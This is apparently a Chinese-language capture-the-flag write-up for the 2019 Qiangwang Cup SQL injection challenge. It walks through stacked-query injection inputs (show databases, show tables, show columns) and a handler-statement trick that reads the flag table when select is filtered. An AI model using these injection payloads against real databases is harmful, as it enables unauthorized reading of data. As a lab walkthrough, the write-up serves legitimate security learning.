[强网杯 2019]随便注

张开发
2026/4/18 18:09:00 15 分钟阅读

分享文章

[强网杯 2019]随便注
1.实验原理Sql注入show使用handler语句2.实验步骤打开靶场随便输入一下输入1’测试是否存在sql注入目前看是存在随便注入一下看到这道题的正则匹配出了他禁用的这些还可以用show输入1;show databases;查看数据库看到出现了许多数据库再1;show tables;看数据表这里查看这表里的栏。输入1;show columns from words;但是发现没有东西去找另一个表1919810931114514注意这里因为名字全为数字就需用反引号括起来输入1;show columns from 1919810931114514; 这里就看到了flag这里由于select被禁用所以搜索了得到用handler语句替代,输入1;handler 1919810931114514 open;handler 1919810931114514 read first;#得到flag

更多文章